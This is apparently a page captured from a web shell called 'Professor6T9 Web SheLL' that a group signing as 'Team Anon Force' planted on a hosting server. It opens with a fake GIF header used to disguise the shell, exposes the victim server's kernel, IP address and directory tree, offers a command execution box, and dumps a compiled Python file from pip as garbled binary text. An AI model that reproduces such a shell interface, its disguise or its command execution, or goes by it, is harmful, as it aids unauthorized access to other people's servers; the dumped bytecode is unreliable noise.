GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium133.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
162.0.232.69
/
opt
/
imunify360
/
venv
/
lib
/
python3.11
/
site-packages
/
pip
/
_internal
/
index
/
__pycache__
[ HOME ]
Exec
Submit
File Name : package_finder.cpython-311.pyc
� L�i0� � �8 � d Z ddlmZ ddlZddlZddlZddlZddlZddlZddl m Z ddlmZ ddl mZmZmZ ddlmZ ddlmZ dd lmZmZ dd lmZmZmZ ddlmZ ddlmZm Z m!Z!m"Z"m#Z# dd l$m%Z%m&Z& ddl'm(Z( ddl)m*Z* ddl+m,Z, ddl-m.Z. ddl/m0Z0 ddl1m2Z2 ddl3m4Z4 ddl5m6Z6 ddl7m8Z8 ddl9m:Z: ddl;m<Z< ddl=m>Z> ddl?m@Z@ ddlAmBZB ddlCmDZD ddlEmFZF ddlGmHZH erddlImJZJ g d �ZK e<eL� � ZMeeNd! eNeOePf f ZQeNeOeOeOeeeO eQf ZR dFdGd*�ZS G d+� d,ejT � � ZU G d-� d.� � ZVdHd5�ZWe G d6� d7� � � � ZX ed8�9� � G d:� d;� � � � ZY G d<� d=� � ZZ G d>� d?� � Z[dIdC�Z\dJdE�Z]dS )Kz!Routines related to PyPI, indexes� )�annotationsN)�Iterable)� dataclass)� TYPE_CHECKING�Optional�Union)� specifiers)�Tag)�NormalizedName�canonicalize_name)�InvalidVersion�Version�_BaseVersion)�parse)�BestVersionAlreadyInstalled�DistributionNotFound�InstallationError�InvalidWheelFilename�UnsupportedWheel)� LinkCollector�parse_links)�select_backend)�InstallationCandidate)� FormatControl)�Link)�ReleaseControl)�SearchScope)�SelectionPreferences)�TargetPython)�Wheel)�InstallRequirement)� getLogger)�WHEEL_EXTENSION)�Hashes)� indent_log)�build_netloc)�check_requires_python)�SUPPORTED_EXTENSIONS)� TypeGuard)r �BestCandidateResult� PackageFinder� F�linkr �version_info�tuple[int, int, int]�ignore_requires_python�bool�returnc � � t | j |�� � }|spd� t t |� � � � }|s$t � d|| j | � � dS t � d|| j | � � n6# t j $ r$ t � d| j | � � Y nw xY wdS )aa Return whether the given Python version is compatible with a link's "Requires-Python" value. :param version_info: A 3-tuple of ints representing the Python major-minor-micro version to check. :param ignore_requires_python: Whether to ignore the "Requires-Python" value if the given Python version isn't compatible. )r. �.z4Link requires a different Python (%s not in: %r): %sFzBIgnoring failed Requires-Python check (%s not in: %r) for link: %sz2Ignoring invalid Requires-Python (%r) for link: %sT) r'